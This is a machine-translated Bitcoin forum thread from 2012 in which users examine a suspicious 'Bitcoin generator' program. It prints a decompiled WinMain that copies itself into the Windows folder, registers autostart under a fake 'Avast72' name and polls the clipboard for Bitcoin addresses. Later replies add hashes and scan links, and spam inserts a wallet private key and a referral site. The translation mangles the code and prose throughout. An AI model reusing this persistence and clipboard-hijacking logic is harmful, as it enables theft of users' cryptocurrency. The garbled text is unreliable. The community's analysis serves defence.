«Allseingbiteye» - вирус, или просто странно?

скорее всего, вирус

декомпилированы WinMain

Код:

ИНТ __stdcall WinMain (HINSTANCE HINSTANCE, HINSTANCE hPrevInstance, LPSTR lpCmdLine, внутр nShowCmd)
{
  INT v4; // EBX @ 1
  неподписанных INT v5; // EAX @ 9
  SIZE_T v6; // еди @ 10
  HANDLE v7; // еси @ 10
  Const символ * v8; // ECX @ 11
  HANDLE v9; // EAX @ 11
  пустота * v10; // еси @ 11
  Const CHAR * v11; // EAX @ 11
  INT v12; // ECX @ 14
  INT v13; // еди @ 14
  CHAR v14; // аль @ 15
  HKEY HKEY; // [зр + Ch] [п.н.-17Ch] @ 30
  обугливается V17; // [SP + 13h] [п.о.-175h] @ 3
  пустота * v18; // [зр + 14h] [BP-174H] @ 29
  неподписанных INT v19; // [зр + 28h] [BP-160H] @ 28
  Const символ * v20; // [зр + 30h] [п.н.-158h] @ 9
  INT v21; // [зр + 40h] [п.н.-148h] @ 9
  неподписанных INT v22; // [зр + 44h] [п.н.-144h] @ 9
  CHAR ExistingFileName; // [зр + 4Ch] [BP-13 канал] @ 1
  обугливается V24; // [зр + 61h] [BP-127H] @ 2
  обугливается V25; // [зр + 68h] [п.н.-120h] @ 1
  СИМ Строка1 [52]; // [зр + 150h] [п.н.-38h] @ 11
  неподписанных INT v27; // [зр + 184h] [п.н.-4h] @ 1
  INT v28; // [зр + 188h] [п.н. + 0h] @ 1

  V27 = (без знака целое)&v28 ^ __security_cookie;
  V4 = оператор нового (4u);
  * (_ DWORD *) v4 = 33120;
  dword_40D9E4 = v4;
  тетсру (&ExistingFileName, "C: \\ WINDOWS \\ mcfartietrby.exe", 0x1Cu);
  MemSet (&V25, 0, 0xE8u);
  если (sub_401040 () == * (_ DWORD *) v4 + 9)
   --v24;
  * (_ DWORD *) v4 + = 9;
  V17 = зЬгстр (&ExistingFileName (Const символ *)"C: \\ WINDOWS \\ mcfartietray.exe") == 0;
  если (sub_401040 () == * (_ DWORD *) v4)
  {
   если (v17)
   {
   если (byte_40D9E8)
   GetModuleFileNameA (0, &ExistingFileName, 0x104u);
   }
  }
  если (CopyFileA (&ExistingFileName, (LPCSTR)"C: \\ WINDOWS \\ mcfartietray.exe", 1))
  {
   RegOpenKeyExA (HKEY_LOCAL_MACHINE, "SOFTWARE \\ Microsoft \\ Windows, \\ CurrentVersion \\ Run", 0, й, &HKEY);
   RegSetValueExA (HKEY, "Avast72", 0, й, "C: \\ WINDOWS \\ mcfartietray.exe", 0x1Cu);
   ShellExecuteA (0, 0, (LPCSTR)"C: \\ WINDOWS \\ mcfartietray.exe", 0, "C: \\", 0);
   Гото LABEL_31;
  }
  CreateMutexA (0, 0, "mcfartietray");
  если (GetLastError () == 183)
  {
LABEL_31:
   V0 = 0;
   возвращать 0;
  }
  v5 = GetTickCount ();
  srand (v5);
  V22 = 15;
  V21 = 0;
  Lobyte (V20) = 0;
  если (v17)
  {
   в то время как (1)
   {
   делать
   {
   делать
   {
   Sleep (0x1F4u);
   OpenClipboard (0);
   V7 = GetClipboardData (1u);
   CloseClipboard ();
   v6 = GlobalSize (V7);
   }
   в то время как (v6 - 30 > 9);
   OpenClipboard (0);
   V9 = GetClipboardData (1u);
   V10 = V9;
   V11 = (Const символ *) GlobalLock (V9);
   lstrcpyA (Строка1, V11);
   GlobalUnlock (V10);
   CloseClipboard ();
   v8 = V20;
   если (V22 < 0x10)
   v8 = (Const символ *)&v20;
   }
   в то время как (зЬгстр (String1, v8)!);
   V13 = v6 - 1;
   v12 = 0;
   если (v13 <= 0)
   {
LABEL_26:
   если (Строка1 [0] == 49 || Строка1 [0] == 51)
   {
   sub_401430 ();
   sub_401590 ();
   если (v19 >= 0x10)
   Оператор удаления (V18);
   }
   }
   еще
   {
   в то время как (1)
   V14 == 48)
   ломать;
   ++v12;
   если (v12 >= V13)
   Гото LABEL_26;

   }
   }
  }
  возвращать 0;
}

он добавляет программу в запуске системы. довольно подозрительно имо.
Сканирование на вирусы https://www.virustotal.com/file/d99c08d052a02e82ca1ae0ca17300f30c2a4fe8861fe8426afb4367b30daa279/analysis/1327723958/
Анализ выполнения: http://anubis.iseclab.org/?action=result&TASK_ID = 17f90702efa19eb14a9df4ac9504bbf98&Формат = HTML

28 января 2012, 3:45:25 AM	# 1
ThePiachu Сообщения: 442 Цитировать по имени цитировать ответ	Re: "allseingbiteye" - вирус, или просто странно? Взлом Биткоин адресов. 500 Биткоинов взломаны в "мозговом кошельке" с паролем "bitcoin is awesome" Адрес кошелька: 14NWDXkQwcGN1Pd9fboL8npVynD5SfyJAE Приватный ключ: 5J64pq77XjeacCezwmAr2V1s7snvvJkuAz8sENxw7xCkikceV6e подробнее... Всем кто хочет заработать Биткоины без вложений - рекомендую сайт http://bitcoin-zarabotat.ru На Bitcoin SE кто-то упомянул об этом сайте: Http: // [кошелек похититель] .tk / Вопрос можно найти здесь: http://bitcoin.stackexchange.com/q/2778/323 Кто-нибудь проверил ли этот сайт распространяет какой-то вирус?

28 января 2012, 4:10:28 AM	# 2
зиний Сообщения: 2058 Цитировать по имени цитировать ответ	Re: "allseingbiteye" - вирус, или просто странно? Получил 1806 Биткоинов Реальная история. скорее всего, вирус декомпилированы WinMain Код: ИНТ __stdcall WinMain (HINSTANCE HINSTANCE, HINSTANCE hPrevInstance, LPSTR lpCmdLine, внутр nShowCmd) { INT v4; // EBX @ 1 неподписанных INT v5; // EAX @ 9 SIZE_T v6; // еди @ 10 HANDLE v7; // еси @ 10 Const символ * v8; // ECX @ 11 HANDLE v9; // EAX @ 11 пустота * v10; // еси @ 11 Const CHAR * v11; // EAX @ 11 INT v12; // ECX @ 14 INT v13; // еди @ 14 CHAR v14; // аль @ 15 HKEY HKEY; // [зр + Ch] [п.н.-17Ch] @ 30 обугливается V17; // [SP + 13h] [п.о.-175h] @ 3 пустота * v18; // [зр + 14h] [BP-174H] @ 29 неподписанных INT v19; // [зр + 28h] [BP-160H] @ 28 Const символ * v20; // [зр + 30h] [п.н.-158h] @ 9 INT v21; // [зр + 40h] [п.н.-148h] @ 9 неподписанных INT v22; // [зр + 44h] [п.н.-144h] @ 9 CHAR ExistingFileName; // [зр + 4Ch] [BP-13 канал] @ 1 обугливается V24; // [зр + 61h] [BP-127H] @ 2 обугливается V25; // [зр + 68h] [п.н.-120h] @ 1 СИМ Строка1 [52]; // [зр + 150h] [п.н.-38h] @ 11 неподписанных INT v27; // [зр + 184h] [п.н.-4h] @ 1 INT v28; // [зр + 188h] [п.н. + 0h] @ 1 V27 = (без знака целое)&v28 ^ __security_cookie; V4 = оператор нового (4u); * (_ DWORD ) v4 = 33120; dword_40D9E4 = v4; тетсру (&ExistingFileName, "C: \\ WINDOWS \\ mcfartietrby.exe", 0x1Cu); MemSet (&V25, 0, 0xE8u); если (sub_401040 () == (_ DWORD ) v4 + 9) --v24; (_ DWORD ) v4 + = 9; V17 = зЬгстр (&ExistingFileName (Const символ )"C: \\ WINDOWS \\ mcfartietray.exe") == 0; если (sub_401040 () == * (_ DWORD ) v4) { если (v17) { если (byte_40D9E8) GetModuleFileNameA (0, &ExistingFileName, 0x104u); } } если (CopyFileA (&ExistingFileName, (LPCSTR)"C: \\ WINDOWS \\ mcfartietray.exe", 1)) { RegOpenKeyExA (HKEY_LOCAL_MACHINE, "SOFTWARE \\ Microsoft \\ Windows, \\ CurrentVersion \\ Run", 0, й, &HKEY); RegSetValueExA (HKEY, "Avast72", 0, й, "C: \\ WINDOWS \\ mcfartietray.exe", 0x1Cu); ShellExecuteA (0, 0, (LPCSTR)"C: \\ WINDOWS \\ mcfartietray.exe", 0, "C: \\", 0); Гото LABEL_31; } CreateMutexA (0, 0, "mcfartietray"); если (GetLastError () == 183) { LABEL_31: V0 = 0; возвращать 0; } v5 = GetTickCount (); srand (v5); V22 = 15; V21 = 0; Lobyte (V20) = 0; если (v17) { в то время как (1) { делать { делать { Sleep (0x1F4u); OpenClipboard (0); V7 = GetClipboardData (1u); CloseClipboard (); v6 = GlobalSize (V7); } в то время как (v6 - 30 > 9); OpenClipboard (0); V9 = GetClipboardData (1u); V10 = V9; V11 = (Const символ ) GlobalLock (V9); lstrcpyA (Строка1, V11); GlobalUnlock (V10); CloseClipboard (); v8 = V20; если (V22 < 0x10) v8 = (Const символ *)&v20; } в то время как (зЬгстр (String1, v8)!); V13 = v6 - 1; v12 = 0; если (v13 <= 0) { LABEL_26: если (Строка1 [0] == 49 \|\| Строка1 [0] == 51) { sub_401430 (); sub_401590 (); если (v19 >= 0x10) Оператор удаления (V18); } } еще { в то время как (1) V14 == 48) ломать; ++v12; если (v12 >= V13) Гото LABEL_26; } } } возвращать 0; } он добавляет программу в запуске системы. довольно подозрительно имо. Сканирование на вирусы https://www.virustotal.com/file/d99c08d052a02e82ca1ae0ca17300f30c2a4fe8861fe8426afb4367b30daa279/analysis/1327723958/ Анализ выполнения: http://anubis.iseclab.org/?action=result&TASK_ID = 17f90702efa19eb14a9df4ac9504bbf98&Формат = HTML

28 января 2012, 7:01:55 AM	# 3
dooglus Сообщения: 2380 Цитировать по имени цитировать ответ	Re: "allseingbiteye" - вирус, или просто странно? Цитата: Груэ 28 января 2012 года, 4:10:28 AM декомпилированы WinMain Это очень впечатляет. Какой инструмент вы использовали, чтобы сделать это?

28 января 2012, 7:48:46 AM	# 4
sveetsnelda Сообщения: 620 Цитировать по имени цитировать ответ	Re: "allseingbiteye" - вирус, или просто странно? Он даже делает запись запуска выглядеть это антивирусный сканер (Avast72). Большинство, конечно, вирус / вредоносных / шпионских программ.

14 февраля 2012, 9:12:47 AM	# 5
CD-RW Сообщений: 57 Цитировать по имени цитировать ответ	Re: "allseingbiteye" - вирус, или просто странно? Извините за натыкаясь, я нашел какую-то новую информацию ... Новая ссылка получил добавлено около генератора Bitcoin на некотором Tor форуме. "Bitcoin generator.exe" 51.735 байт. SHA256: 1f39c2b55839ffb833f653c44a6274230f6e61710c03153356911cd8cdd42f7b VirusTotal: https://www.virustotal.com/file/1f39c2b55839ffb833f653c44a6274230f6e61710c03153356911cd8cdd42f7b/analysis/ Я нашел эту нить из-за то, что он все еще использует C: \ Windows \ mcfartietrby.exe Я также нашел это письмо в двоичных данных: seren1ty0wns@gmail.com ThreatExpert для файла: http://www.threatexpert.com/report.aspx?md5=ede9632fc341e0279bb3f8a49b8730f1

20 апреля 2012, 12:50:06 AM	# 6
MPOE-PR Сообщения: 756 Цитировать по имени цитировать ответ	Re: "allseingbiteye" - вирус, или просто странно? котировка mcfartietray.exe ...McFartieTray ?! Звучит фол в любом случае.

Заголовок